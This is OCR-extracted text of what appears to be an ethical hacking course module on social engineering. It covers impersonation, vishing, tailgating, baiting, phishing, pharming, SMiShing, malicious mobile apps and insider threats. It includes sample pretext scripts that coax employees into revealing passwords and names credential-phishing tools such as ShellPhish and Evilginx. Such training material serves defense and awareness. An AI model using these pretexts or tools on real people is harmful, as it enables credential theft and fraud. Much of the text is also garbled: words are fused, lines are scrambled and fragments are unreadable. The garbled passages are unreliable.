Attackers use mobile applications to carry out mobile-basedsocial engineering,
Attackerstrickthe usersbyImitating
applications
popular
with attractive featuresand submitting
the samename. Usersunknowingly
and
applicationscreating maliciousmobile
themto the majorappstores with
downloadthe maliciousapp,allowing the malware
to their
infect device.
attackersu se to perform
Listedbelow are some techniques mobile-based
social
engineering:
© Publishingmaliciousapps ©. Using applications
fakesecurity
© Repackaging
legitimate
apps © SMiishing
(SMSPhishing)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Human-basedSocialEngineering
Impersonation
“a
(9 acer pretends
Theattcher
may tobe
someone
legimate
authorized
impersonate
person
lepine or
oan
authored
prion
ether
erinalor nga mediumsch
communication at
attackers
18 impersonation
target
helps
revealing
sensitive
nfrmation
oka ito
Impersonation
Examples
Human-basedSocialEngineering
(Cont'd)
Tmpersgnation
|&-Vshing
|" aahe
(oie or VoPphishing)an
ks indvdulsto reveal
impersonation
andnani
personal
(electronic
teehngue fraud) i n
using
infarmaton voc which
the
technology
"Thin
party Authorization ‘Tech
Support
estar
praca te
9
Module 1210
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Human-basedSocialEngineering
(Cont'd)
Eavesdropping Shoulder Surfing DumpsterDiving
Human-basedSocialEngineering
(Cont'd)
Engineering
or
ater
te
information
needs
before feng tat he stacker
Megincing
| fame
©
connate
Tangating |" None wearing
18The atacer,
dbade,
orafake
pon troughs
ene
ro
Sycos olowingen
9
Module 1212
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Human-basedSocialEngineering
(Cont'd)
Baiting es let
na people
lcaton where can
Posing
asa
legitimate
user
asan important
end-user
Posing
Posing
support
technical
asa
agent client,or vendor
as an internalemployee,
as
aover-helpfulness
Posing repairman
‘Abusing
Posing
the
someone
as
with ofthe
help
desk
third-party
authorization
agent
through
as a techsupport
Posing
Posing
vishing
as a trustedauthority
ical andCountermensores
Mackin ©by E-Comel
Copyright
tricksthatan attackerperforms
Someimpersonation to gather
sensitive information
aboutthe
the humannature of trust,fear,andmoralobligation.
exploit
targetorganization
Posing EndUser
as a Legitimate
attackermight
‘An an employee
impersonate andthenresort to deviantmethods
to gain
access to privileged
data. They
may provide
a false identity
to obtain sensitive
information.
Anotherexample is whena “friend―
of an employee asksthemto retrieve information
that a bedriddenemployee supposedly needs.Thereis a well-recognized rule i n social
interaction that a favorbegetsa favor, even if the original
“favor―
is offered without a
request
from
the
with reciprocation
impersonation.
recipient.
daily.
Thisis knownas reciprocation.
Socialengineerstry to take advantage Corporate
environmen
deal
of thissocialtrait via
Example:
"Hil
This
ie
is Johnfromthe finance department.
| haveforgotten
mypassword.
Canget
|
Posing
as an Important
User
Anotherbehavioralfactorthat aids a socialengineeris people’s habitof not questioning
authority. People oftengo out of their way for thosewhom theyperceiveto have
authority. An attackerposingas an important individual suchas a vice president
—
or
director —
can often manipulate an unprepared employee. Attackerswho take
impersonation to a higherlevel byassuming the identity of an important employee add
an elementof intimidation.Thereciprocation factoralsoplays a role i n thisscenario
wherelower-levelemployees might go out of their way to helpa higher-authority. For
example, itis lesslikely thata help-desk employee will turn downa request froma vice
president who is hard-pressed for time andneedssome vital informationfor a meeting.
In casean employee refusesto divulge information, socialengineersmayuse authority
to intimidateemployees andmay even threatento reportthe employee's misconduct to
their supervisors.Thistechnique assumes greatersignificance whenthe attacker
considers i t a challengeto getaway with impersonating an authority figure
Example:
"HilThisis Kevin,
systempassword.
the CFO'sSecretary.I'm working
Canyou helpme out?―
and forgot
project,
on a n urgent my
|
Posing Support
as a Technical Agent
Another technique involvesan attackermasquerading as a technicalsupport agent,
when the victim is not proficient
particularly in technicala reas. The attackermay
pretend to be a hardware vendor, a technician,or a computersupplier. One
demonstrationat a hackermeetinghadthe speaker callingStarbucksandasking i ts
‘employees
whethertheir broadbandconnection was properly working.Theperplexed
employee repliedthat it was the modemthat was giving them trouble.Thehacker,
ical andCountermensores
Mackin ©by E-Comel
Copyright
withoutgivinganycredentials, went on to makehimreadout thecreditcardnumberof
scenario,the attackermay askemployees
the lasttransaction. In a corporate to reveal
theirlogin information, including
theirpassword,to fixa nonexistent problem.
Example:
“Sir,
this is Mathew,technicalsupportat XCompany. Lastnightwe hada system crash
andwe are checking
here, forlostdata.Canyougiveme your IDandpassword?―
Posingas an InternalEmployee,Client,or Vendor
Theattackerusually clothesor anothersuitableuniform.They
dressesup i n business
enter an organization’s
building
while pretending client,service
to be a contractor,
personnel, or anotherauthorizedperson.Thentheyroam aroundunnoticedandlook
for passwords stuckon terminals,extract criticaldata from wastepaper bins,papers
lyingon desks,and perform other information gathering. The attacker may also
implement other socialengineeringtechniques suchas shouldersurfing (observing
users typinglogincredentialsor other sensitive information) and eavesdropping
{purposely overhearing confidential conversations between employees) to gather
sensitive informationthat mighthelplauncha n attackon the organization.
Repairman
Computer technicians,electricians, and telephone repairpersons are generally
unsuspected people. mightimpersonate
Attackers a technicianor repair personand
They
enter the organization. perform
normalactivities associated
with their assumed
dutywhilelooking
for hiddenpasswords,
criticalinformation information
o n desks, in
trashbins,
andotherusefulinformation;theysometimeseven plant
snoopingdevicesi n
hiddenlocations.
Impersonation (Vishing)
Vishing (voice
or VoIP phishing)
is an impersonation technique
i n whichthe attackeruses Voice
technology
over IP (VoIP) their criticalfinancial
to trick individualsinto revealing andpersonal
informationand uses the informationfor financialgain. The
forge
identification.
resembling
a legitimate
pre-recorded
includes
In manycases,Vishing
financialinstitution. Through
Vishing,
attacker
uses callerID spoofing
andinstructions
messages
the attackertricksthe victim into
to
providing
bankaccount or creditcarddetailsforidentity over the phone.
verification
Theattackermaysenda fakeSMSor emailmessage to the victim,askingthe victim to callthe
financialinstitution for credit card or bank account verification.In some cases,the victim
receives a voice callfromthe attacker.When thevictim callsthe numberlistedi n the message
or receives the attacker'scall,theyhearrecordedinstructions that insist theyprovide personal
and financialinformation like name, date of birth,socialsecuritynumber, bankaccount
numbers, credit card numbers, or credentialslike usernames, passwords. Oncethe victim
provides theinformation, therecorded message confirms verification
ofthevictim’saccount.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Discussed
beloware some tricksattackers
use whenVishing sensitive information
to gather
=
Abusing
the Over-Helpfulness
of HelpDesk
Help
desksare frequently
targetedfor socialengineering attacksfor a reason. Thestaff
members to behelpful,
are trained andthey
oftengiveawaysensitive information
such
passwords
‘as andnetworkinformationwithout verifying
the authenticity
of the caller.
Theattackershouldknowemployees’ names andhavedetailsaboutthe person he is
ical andCountermensores
Mackin ©by E-Comel
Copyright
detectthe problem.Believing theuser wouldprovide
themto be a troubleshooter, the
requiredinformation.
Example:
Attacker: Somefolksi n your officehavereported
thisis Mikefromtechsupport.
“Hi a
slowdownin logging.
Isthistrue?―
Employee:
“Yes, slowlately.―
it hasseemed
Attacker:“Well,
we havemovedyou to a new server, andyour service shouldbe
muchbetter now. If you want to give me your password,| can checkyour service.
Things
will bebetterfromnow on.―
TrustedAuthority
Figure
Themost effectivemethodof socialengineeringis posingas a trustedauthority figure.
attackermight
‘An pretendto be a fire marshal, superintendent, auditor, director,or
figure
other important over the phone or in-personto obtainsensitive informationfrom
the target.
Example:
1amJohnBrown.I'mwiththeexternalauditor,
1. “Hi, ArthurSanderson. We'vebeen
requested
bythe corporateto do a surprise inspectionof your disasterrecovery
procedures.
Yourdepartment has10 minutes to showme howyou wouldrecover
froma websitecrash.―
haveSharon,
“Hi,
'm
sales York this
a
short
notice,
repout of the New
a groupof prospective
to outsource their security
office.| know is
clientsout in the car, andI've beentryingto
needsto
training us for months.
but
getthem
They're
a
located
that
I
of our facilities,
up.
quick
just fewmilesaway,and I think
it wouldbeenough
to push
if can give thema
themover the edge
tour
andgetthemto sign
Oh yeah,theyare particularly
interestedin what securityprecautions we've
adopted.
It seems someone hackedinto their websitea while back,
whichis one of
thereasonsthey're considering
our company.―
“Hi,
'm with Aircon Express Wereceiveda callthat thecomputer
Services. room is
gettingtoo warm, so | need to checkyour HVACsystem.― Usingprofessional-
sounding terms likeHVAC(Heating, andAir Conditioning)
Ventilation, mayaddjust
enough
credibility masquerade
to an intruder’s to allowthemto access the targeted
secured
resource.
Eavesdropping
Eavesdropping
refersto an unauthorizedperson listening
to a conversation or reading
others’
messages.
the of
It includes interceptionany formof communication,
written,usingchannelssuchas telephone
obtainsensitive information
lines,
email,
suchas passwords, plans,
business phone
audio,
including video,or
An attackercan
and instant messaging.
numbers,
andaddresses.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Shoulder Suxfing
Shouldersurfing is the technique of lookingover someone's shoulderas theykeyinformation
into a device.Attackersuse shoulder surfingto findout passwords, personal
identification
numbers, account numbers, andother information.They sometimes even use binocularsand
otheroptical devices or installsmallc ameras to recordthe actionsperformed on the victim's
system to obtainlogin detailsandothersensitive information
Dumpster Diving
Dumpster diving sensitive personal
is the processof retrieving or organizational
informationby
searchingthrough trash bins, Attackerscan extract confidential data such as user IDs,
passwords,policynumbers, networkdiagrams, account numbers, bankstatements,salarydata,
source code,
salesforecasts, access codes,phone lists,creditcard numbers,calendars,and
organizational
chartson paper or disk.Attackerscan then use this informationto perform
variousmaliciousactivities. Sometimesattackerseven use pretextsto supporttheirdumpster
diving suchas impersonating
initiatives, cleaner,
a repair person, technician, or otherlegitimate
worker,
Informationthatattackers can obtainbysearching through trashbinsincludes:
Phone lists:Disclose
©
Organizational
employees’
numbers.
names andcontact
Support:
their on
placing contact
the
error
message
number
Evenif theattacker hasalready
itself,
acquiredthedesiredinformation, theymay
continue to assistthe users so that theyremain ignorant of the hacker'sidentity.
A good example of a reverse socialengineeringvirus is the “MyParty―
worm. Thisvirus
does not relyon sensationalsubject
linesbut rather makesuse of inoffensiveand
realistic
names using
realisticgains
the By
for its attachments.
trust,confirmstheuser'signorance,andcompletes
words,theattacker user’s
thetaskof informationgathering,
Piggybacking
Piggybacking
usually
implies
entryinto a building
or securityarea with the consent of the
authorizedperson.Forexample,an attackermight requestan authorizedpersonto unlock
securitydoor,sayingthat theyhave forgotten their ID badge.
In the interest of common
theauthorizedpersonwill allowtheattackerto passthrough
courtesy, the door.
Tailgating
Tailgating
implies a building
accessing or securedarea without the consent of the authorized
person.It is the act of following
an authorizedpersonthrough a secure entrance,as a polite
user would open and hold the door for thosefollowing them.An attacker, wearinga fake
badge,mightattemptto enter the securedarea byclosely following an authorizedperson
through a door that requireskey access. They
then try to enter the restrictedarea while
pretending to be an authorizedperson.
Diversion Theft
Diversion theft is a technique where attackerstargetdelivery professionalsor transport
companies. Thistechnique is alsoknownas “Roundthe CornerGame― or “Cornet
Game.― The
main objective
Into delivering to
of this technique
the consignment
is trick a personresponsible
to the wronglocation,
for making
thus interrupting
a genuinedelivery
the transaction, For
example, driver
delivering
if the victim is a van
to drive to a locationother thanthe actualdelivery
a package,thenthat person wouldbe persuaded
location.Subjecting
series of socialengineering tricksthusallowsthetheft to besuccessful
the van driver to a
ical andCountermensores
Mackin ©by E-Comel
Copyright
Baiting
Baiting i n whichattackersoffer end users something
is a technique alluring
i n exchange for
importantinformationsuchas logindetailsandother sensitive data.Thistechnique relieson
the curiosityandgreed Attackersperform
of the end-users. byleaving
this technique a physical
devicesuchas a USBflashdrivecontaining wherepeople
maliciousfilesin locations can easily
find them,suchas parking
legitimate
company’s
systems.
logo,
thereby
lots,elevators,
tricking
end-users
andbathrooms. Thisphysical
into trustingit andopeningit on their
Oncethe victim connectsand opens the device,
a malicious
is
device labeled with a
to
whohaveaccess sensitive information. In socialengineering,the purposeofelicitation
extract relevantinformationto gain access to the targetassets.
i s to
ical andCountermensores
Mackin ©by E-Comel
Copyright
SocialEngineering
Computer-based
Windows
Pop-Up |
crsen too
©Windowsthat udeny popup whl srg the nts
in
a ak for norton
Letters
Hoax
the thet
tral that poe worse
unerspneer
wer aboutnew vr, Tolnaor wos ey harm
ts pts
Letters number
of
cain Emails
t hatofferfee sucha s money andsoftwareon contion hat the s e forward
thermal spectnad people
|
InstantChat_|
accseager by
chatting
wth
meldenlected
eres,
Gathering
personal
information
auchebith cots and
wer one eget infrmaton
Spam network
Email information
relevant,u nwanted,
anduso
‘cilecurty numbers,and
emai that attempt
to col nani information,
SocialEngineering
Computer-based
Attackersperform
Discussed
social malicious
computer-basedengineering using various
applications
viruses, trojans,andspyware,and software
beloware typesof computer-based
programssuchas.
suchas emailand instant messaging
socialengineeringattacks:
Pop-Up
Pop-ups
Windows
compel
trick or clickinghyperlink
users into a that redirectsthemto fakeweb
pagesasking for personal informationor downloading maliciousprogramssuchas
keyloggers, trojans,or spyware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Examples
of pop-upsusedfortricking
users:
‘orve
me
aor
woea
1Million
Hoax Letters
showing
Screenshots
Figure9.2: sample windows
pop-up
hoaxis a message
‘A warningits recipients of a non-existentcomputer virus threat.It
relieson socialengineeringto spread i ts reach.Usually, hoaxesdo not cause any
physicaldamage but they
or lossof information; cause a lossof productivity
anduse an
organization’
valuablenetworkresources.
ChainLetters
A chainletter is a messageoffering free gifts,suchas money and software, on the
conditionthat the user forwards the emailto a predetermined numberof recipients.
Commonapproaches usedi n chainlettersare emotionally “get-ri
convincing stories,
quick―
pyramid schemes, spiritual
beliefs, threatsof badluckto the
and superstitious
recipientif they“break
the chain"and fail to passon the message or simplyrefuseto
readitscontent. Chainlettersalsorely to spread.
o n socialengineering
InstantChatMessenger
attackerchatswith selected
‘An onlineusersvia instant chat messengers andtries to
gathertheir personalinformationsuchas dateof birth or maidenname. They then use
theacquired informationto crackusers’
accounts.
Email
‘Spam
Spamis irrelevant,unwanted,and unsolicitedemailsdesigned to collectfinancial
numbers,
informationsuchas socialsecurity and networkinformation.Attackerssend
spammessages to the targetto collectsensitive information,
suchas bankdetails.
Attackersmay alsosendemailattachmentswith hiddenmaliciousprograms suchas
engineerstry to hidethe file extension bygiving the
viruses and trojans.Social
along
attachment filename.
Scareware
Scareware is a typeof malwarethat trickscomputer malware-infested
users into visiting
websites or downloading or buying malicious
potentially software. i s often
Scareware
seen i n pop-ups that tell the targetuser that their machinehasbeen infectedwith
malware,Thesepop-upsconvincingly appear as though theyare comingfrom a
legitimate source suchas an antivirus company. Further, thesepop-upadsalways have
a senseof urgencyandtell the victim to quickly download thesoftwareif they
want to
getrid of the supposed virus.
9
Module Page1224 ical andCountermensores
Mackin
©
Copyright
by E-Comel
SocialEngineering:
Computer-based Phishing
ps
redrecthattrustworthy
wes
ses,
to fhe webpages mirc which
ak the
|
SocialEngineering:
Computer-based Phishing
(Contd) CEH
Modul
9 1222
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
SocialEngineering:
Computer-based Phishing
(Cont'd)
‘Types
of Phishing
tecikcpenen
ertimetpee
eons
Pharming
Avvo gum Dt
ems stant Mes
s
Phishing
Phishing
is @technique an emailor provides
i n whichan attackersends a link falsely
claiming
to
befroma legitimate site to acquirea user'spersonal or account information.
Theattacker
theyare
a
to users. Whena user clicks
lured into sharing
a
registersfakedomainname,builds lookalikewebsite,
o n the emaillink,
andthen mailsthefakewebsite'slink
them to the fake webpage,
i t redirects where
sensitive detailssuchas their addressandcreditcardinformation
Some of the reasons behindthe success of phishing lackof knowledge,
scams includeusers’
being visuallydeceived,andnot payingattention to security indicators.
Thescreenshot belowis an example of an illegitimate
emailthat claimsto befroma legitimate
sender.Theemaillink redirectsusersto a fakewebpage andasksthemto submittheirpersonal
or financialdetails.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Examples
of Phishing
Emails
Source:https:/fits.tntech.edu
Today,
most people
use internet banking.
Manypeople
use Internet banking
for all their
financialneeds, suchas onlinesharetrading
and e-commerce. Phishinginvolvesfraudulently
acquiringsensitive information(like
passwords bymasquerading
and credit carddetails) as a
trustedentity.
Thetargetreceives an emailthat appears to befromthe bankandrequests the user to clickon
the URLor the link provided. theirusername, password,
If the user is trickedandprovides and
other information,then the site forwardsthe informationto the attacker,whowill use it for
nefarious purposes.
Subject:importantchangeto your a
eee
Activity
Alert
ear
Valued
Customer
ad, josuzenitinech
Security
Checkpoint
Figure
93:
Screenshot
showing»
phishing em i
ical andCountermensores
Mackin ©by E-Comel
Copyright
94:
Figure Screenshotshowing»
phishing
em l l
‘Types
of Phishing
Spear
Phishing
of
Instead sending
specialized
use
of employees
out thousandsof emails,some attackers
socialengineeringcontent directed
optfor “spear
at a specific
employee
phishing―
and
or smallgroup
to stealsensitive datasuchas financialinformationand
i n an organization
tradesecrets,
Spear
phishing seem to
messages come froma trustedsource with an official-looking
website,Theemailalsoappearsto befrom an individualfromthe recipient's company,
generallysomeone i n a positionof authority. In reality,
the messagei s sent byan
attackerattempting to obtain criticalinformationabout a specific
recipientand their
suchas logincredentials,
organization, credit carddetails,bankaccount numbers,
ical andCountermensores
Mackin ©by E-Comel
Copyright
confidential
passwords, documents,financialinformation,and trade secrets. Spear
phishing
generatesa higher
response rate comparedto a normalphishingattack, as it
appearsto befroma trustedcompanysource.
Whaling
‘whaling
attackis a typeof phishing
thattargetshighprofile
executives likeCEO,
CFO,
politicians,
andcelebritieswhohavecomplete
access to confidentialandhighly
valuable
information.
its socialengineeringtrick i n whichthe attacker
a tricksthe victim into
revealing
critical corporateand personal information (likebank account details,
‘employee
details,
customer information, generally,
and credit card details), through
emailor websitespoofing.
Whaling attack;theemail
is differentfroma normalphishing
or websiteusedfor the attackis carefully designed,
usually
targetingsomeone i n the
executive
Pharming
leadership,
Pharming in whichthe attackerexecutes malicious
is a socialengineeringtechnique
programson a victim'scomputer or server, and whenthe victim enters any URLor
domainname, it automatically redirectsthevictim’s
trafficto an attacker-controlled
website.Thisattack is alsoknown as “Phishingwithout a Lure.―
Theattackersteals
confidential
information banking
likecredentials, andotherinformation
details, related
to web-basedservices.
Pharming
attackcan be performed
i n two ways: DNSCachePoisoning
and Host File
Modification
DNSCachePoisoning:
©. Theattacker performs
DNSCachePoisoning
on the targeted
DNSserver.
©. Theattackermodifies
the IPaddress
of the targetwebsite
“www.targetwebsite.com―
to that of a fakewebsite“www.hackerwebsite.com.―
‘When addressbar,a
the victim enters the targetwebsite'sURLi n the browser's
is sentto the DNSserver
request
to of
obtainthe IP addressthe targetwebsite.
DNS
©.
The server returns a fakeIP
Finally,
address
that
thevictim is redirectedto the fake
modified
by
is already
website,
theattacker.
Host FileModification:
©. Anattackersends
a maliciouscodeas an emailattachment.
© Whenthe user clickso n the attachment,
thecodeexecutesandmodifies localhost
fileson the user’s
computer.
© Whenthe victim enters the targetwebsite’s
URL i n the browsersaddressbar,the
compromised hostfile automatically
redirectsthe user'strafficto the fraudulent
websitecontrolledbythe hacker.
Pharming
attackscan alsobe performed
usingmalwarelikeTrojan
horsesor worms.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Spimming
SPIM (Spam over Instant Messaging)
exploits
Instant Messagingplatforms and uses IM
as a tool to spread spam.A personwho generates spamover IM is calledSpimmer.
Spimmers generally
makeuse of bots (anapplication
that executes automatedtasks
the network)
‘over to harvestInstantMessage
IDsandforwardspammessages to them
likeemailspam,generally
SPIM messages, includeadvertisements
andmalwareas an
attachmentor embedded hyperlink,Theuser clicks
the attachmentandis redirected
to
a maliciouswebsitethat collectsfinancialand personal informationlike credentials,
bankaccount,andcreditcarddetails
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phishing
Tools
Tools
Phishing
Phishing
toolscan beusedbyattackersto generate
fake loginpagesto capture usernames and
passwords,sendspoofed andobtainthevictim'sIP address
emails, and sessioncookies.This
informationcan furtherbe usedbythe attacker,
whowill use it to impersonate a legitimate
user and launch
furtherattacks
on the targetorganization.
+
ShellPhish
Source:https://aithub.com
ShellPhishis a phishing
tool used to phishuser credentials
from various social
networking
platformssuch as Instagram,
Facebook,Twitter,
and LinkedIn.It also
displays
the victim system’s
publicIP address,
browser information,
hostname,
geolocation,
and
other
information.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure96: Screenshotof ShellPhish
shotshowing
theouputofShellPhish
ical andCountermensores
Mackin ©by E-Comel
Copyright
phishing
Someadditional toolsare listedbelow:
=
BLACKEYE
(https://github.com)
+
+
Phishx
(https://github.com)
(hetps://github.com)
Modlishka
Trape(https://github.com)
(https://github.com)
Evilginx
tical
Making
and by
CountermensoresCopyright©
Comet
Mobile-basedSocialEngineering: MaliciousApps
Publishing
and Repackaging
Legitimate
Apps
Malicious
Publishing py Repackaging
Legitimate
Apps
Social Engineering
‘Mobile-based
Publishing
Malicious Apps
In mobile-based socialengineering,the attackerperforms a socialengineeringattackusing
maliciousmobileapps. Theattackerfirst creates the
appwith attractive features andpublishes
— malicious
application
it on majorapplication
suchas a gaming
—
attacker
4 ‘Application
e
Gaming
Malicious AppStore
Modul
9 1234
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Repackaging
Legitimate
Apps
Sometimes malwarecan be hiddenwithin legitimate apps. A legitimate
developer creates
legitimategamingapplications. Platformvendorscreate centralizedmarketplaces to allow
mobileusers to conveniently browseand installthesegamesand apps. Usually, developers
submitgamingapplications to thesemarketplaces, making them available
to thousands of
mobileusers. A maliciousdeveloper downloadsa legitimategame, repackagesit with malware,
and uploads it to the third-partyapplication
store. Oncea user downloads the malicious
application,the maliciousprogram installedon the user'smobiledevicecollectsthe user's
information andsendsi t to the attacker.
Developer
creates Malicious
developer
EE
ess
e8 =.
store
=
Developer
Legitimate
Developer
‘nd
user downloads
maliciousgaming
app
Third-Party
‘App
Store
99:
Figure Repackaging
legitimate
apps
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Mobile-basedSocialEngineering:
FakeSecurity
Applications CEH
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘User
logson
account;
to
a message thelr
bank
willappear
the user to downoadan
telling
application
to
their
pone
Usercredentias sent
Attacker{otheattacker
>
rc
Figure920:
m) applications
Fakesecurity
9
Module 1234
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Mobile-basedSocialEngineering: (SMS
SMiShing Phishing)
2) 3 oe
Sis tet
rect {hating Rian |
|
serie
(SMS
SMiShing Phishing)
Sending SMS is another technique used by attackersi n performing mobile-basedsocial
engineering.In SMiShing (SMS Phishing),
theSMStext messaging systemis usedto lureusers
into taking
instant action suchas downloading
malware, visitinga maliciouswebpage,or calling
a fraudulent phone number.SMiShing messages are craftedto provoke an instantaction from
the
victim, requiringthemto divulge
ConsiderTracy,
their personal
a softwareengineer working
information
i n a reputed
and
account
details.
company. She receives an SMS
ostensibly fromthe security department of XIM Bank.It claimsto be urgent,andthe message
saysthat Tracy shouldcallthe phone numberlistedi n the SMSimmediately. Worried,shecalls
to check o n her account, believingit to be an authentic XIM Bankcustomer service phone
password. message
number.Arecorded
Tracy her her
credit
believesdebit well
asks to provide
itis a genuinemessage andshares
or cardnumber,as
sensitive information.
as her
lucky a that
Sometimesmessage
the
w inner and that they randomly
claims
merely
or otherinformation.
contact number,
user haswon moneyor hasbeen selectedas a
needto pay a nominalfee andsharetheir emailaddress,
BD senses
Shing (SMS
Figure9.11: Phishing)
Modul
9 1235
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
ModuleFlow
Concepts
Social Engineering
Sites
Networking
Soctal
Engineering
Techniques,
Thott Hdentity
Countermeasures
Insider Threats/InsiderAttacks
byor
contractor
negigees
parfomed mplayer car
‘Steal
confidential
dat
Heasons revenge
‘Rttacks
for Insider
come futurecompetitor
competitor’
Perform bidding _
Insider Threats
insider is any
‘An employee
(trusted
person)
who has access to the critical assets of an
An insiderattackinvolvesusingprivileged
organization. accessto violaterulesor intentionally
cause a threat to the organization’s
informationor informationsystems. Insiderscan easily
bypass securityrules,corruptvaluableresources, and access sensitive information. Insider
attacksmaycause greatlossto the company.Further, theyare dangerous becausetheyare
easyto launchanddifficultto detect.
Modul
09 Page1236 ical andCountermensores
Mackin Copyright
©
by E-Comel
Insider
=
attacks
a re
Privileged
generally
performed by:
Users:Attacksmaycome fromthe most trustedemployees of the company,
such as managersand systemadministrators, who have access to the company’s
confidentialdataand a higher of misusingthe data,either intentionally
probability or
unintentionally.
Disgruntled
Employees:
Attacksmay come from unhappy
employees
or contract
workers.Disgruntled
employees,who intend to take revengeon the company, first
andthenwait forthe right
acquireinformation time to compromisethe organization's
resources.
TerminatedEmployees: Someemployees
takevaluableinformationaboutthe company
with them when terminated.Theseemployees access the company’s data after
termination using backdoors,
malware, if theyare not disabled.
or theiroldcredentials
Reasonsfor InsiderAttacks
=
Financial
Gain
{Anattackerperforms an insiderattackmainlyfor financialgain. The insidersellsthe
sensitive informationto its competitor,stealsa colleague's
company’s financialdetails
for personaluse, or manipulates the company's financialrecordsor that of its
personnel.
StealConfidential
Data
‘A
competitor mayinflictdamage stealcriticalinformation,
uponthe targetorganization,
just byfinding
or even put them out of business a jobopening, preparing someone to
ical andCountermensores
Mackin ©by E-Comel
Copyright
BecomeFutureCompetitor
Currentemployees
mayplanto start their own competing businessand,byusingthe
company’s
confidentialdata,theseemployees mayaccess the systemto stealor alter
client
the company’s
list,
PerformCompetitors
Bidding
Due to corporate
espionage, employees
even the most honestand trustworthy can be
coercedinto
revealing
PublicAnnouncement
company’s
critical or
the through
briberyblackmail
information
A disgruntled
damages
the want
employee
may
company’s
to makea political
confidential
data
or socialstatement andso leaksor
InsiderThreatStatistics
Source:https://www.observeit.com
Although
maliciousintent is a serious factorfor organizationalsecurity,according
to a 2018
CostofInsider
ThreatsStudy, an attackcaused byemployee is costlier
or contractor negligence
than
theft
andcredentialtheft bya criminalor maliciousinsider:
Average
annualizedcost for three profiles
a8
Employee
or Criminaland Credential
Contractor
Malicious
Negligence Insider
Theft
9.12:Graph
Figure Insider
Showing ThreatStatistics
ical andCountermensores
Mackin ©by E-Comel
Copyright
of InsiderThreats
Types
Adtsqrontied
(©
terminated
employe
steals
destroys
or
thecompany’s
wo dataor
byInducingmalware
networksintentional oto
Inssers
(©
are potential
Simpl |
who uneductedon
bypass
securtythretsorwhe
generascurtypeocedures
to meetworkplace
reverent
eens
insiders
|@Harmful
their to
whouse technical
knowledge
identity
1Aninsder
with
access
asst
organisation
Compromise
by
outide
hrest
actorwhos
an
to rt ofa Seaton
‘ene
very
of InsiderThreats
‘Types
Thereare
four
types
of
insider
threats.
are:
MaliciousInsider
They
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whyare Insider Attacks Effective?
Insiderattacksare effectivebecause:
+
Insiderattacks
c an go undetected
foryears,andremediation
is expensive.
+
+
Insider
attacksare easyto launch
insiderattacksis difficult;
Preventing an insideattackercan easily
succeed
Itis very difficultto differentiateharmfulactions fromthe employee's regular work.It is
hardto identify whetheremployees are performing malicious
activities or not.
Even after maliciousactivityis detected,the employee
may refuse to accept
responsibility
andclaimit was a mistake.
It is easyfor employees
to cover their actionsbyediting
or deleting
logsto hidetheir
malicious
of activities
ExampleInsiderAttack:Disgruntled
Employee
Most cases of insiderabusecan be traced to individualswho are introverts,incapable of
managingstress,experiencingconflictwith management, frustratedwith their jobor office
politics,craving respector promotion, transferred,demoted, or issuedan employment
termination notice,amongother reasons. Disgruntledemployees maypasscompanysecrets
andintellectualproperty for monetary
to competitors gain,thusharming the organization.
Disgruntled
employees programsto hidecompanysecretsand later
can use steganography
sendthe informationto competitors as an innocuous-looking suchas a picture,
message image,
oF soundfile usinga workemailaccount.No one suspects thembecause
the attackerhidesthe
stolensensitive informationin the pictureor imagefile,
ioe)
Degrurted
sere
tmployee
compaoy's
Figure9.13
company
Newent
ofInsider
Example
ical andCountermensores
Mackin ©by E-Comel
Copyright
BehavioralIndicationsof an InsiderThreat
extant
om
Ti vemos
downing cpr serie dt
sing
moet
netwokos
or
EBeasing trent ot erent oe acu rom sens
TE cnoree
oapu a netnnega pone report in reeneorpenttre
ut
DIronnie
tonets
ftetogn tarts ces pal
Changes
in NetworkUsage
Patterns
Changes of the network-specific
in the networkpatterns protocols,size of the packets,
frequency
sources and destinations, of user application
sessions,andbandwidthusage
can indicatemalicious
activity.
‘Multiple
FailedLogin Attempts
Theinsidercan try to login to unauthorizedsystems bybrute-force.So,
or applications
multiple
failedattempts mayindicatean insiderthreat
ical andCountermensores
Mackin ©by E-Comel
Copyright
andTemporal
Behavioral Changes
changes
behaviorand temporal
Deviation fromestablished i n employee
behaviorsuch
as spending
capacity, travel,angermanagement
frequent issues,constant quarrels
with
colleagues,
andlethargy
i n performing
workare some of thefraudindicators.
UnusualTimeandLocationof Access
mismatch
‘Any i n the timelineof an event can besuspicious
threat.Forexample, if activitiesare loggedon employee andmayindicate a n insider
i n theirabsence.
systems
Missing or Modified Critical Data
Disgruntledemployeesmodify
can or deletesensitive datato damage the reputationof
the organization.
Unauthorized or Copying
Download of SensitiveData
Insidersuse legitimate and malicioustools to extract data from the organization's
perimeter.Insiderscan installmalware,
trojans,andbackdoors to stealinformation.
Sending SensitiveInformationto PersonalEmailAccount
information
Insidersmaysendcriticalorganizational to their personal
emailaccounts
with maliciousintent.
Logging
of DifferentUserAccountsfromDifferentSystems
Unusual times ofaccesscombined
loginto the account may represent a
with change i n the IPaddress
maliciousactivities.
ofthesystemusedto
‘Temporal
Changes
in Revenueor Expenditure
Unexpectedunexplained
and changesi n the financialstatus of an employee
signify
an
income generated
fromexternalsources. Theorganization
shouldaudit their financial
to identify
reports
whether
employee
the
to Physical
UnauthorizedAccess Assets
was involvedi n any malicious
activities.
Complaint on SensitiveDataLeak
Informationor complaints regarding
sensitive dataleakscan represent
an insiderattack
Check for customer reviews andconcerns to identifyanomaliesandanalyze themto
identify
the insider.
Accessof Systems
‘Abnormal andUser Accounts
The mismatch betweenthe systems assigned
anduser accounts usedto access the
systemsmayindicatean insiderthreat.
Irresponsible
SocialMediaBehavior
Insidersmay attemptto create a negative byposting
impacto n the organization
unnecessaryinformationon socialmediawebsites.
Attempt
to AccessRestricted Zones
Employees
with maliciousintent may tryto access restrictedareas of the organization
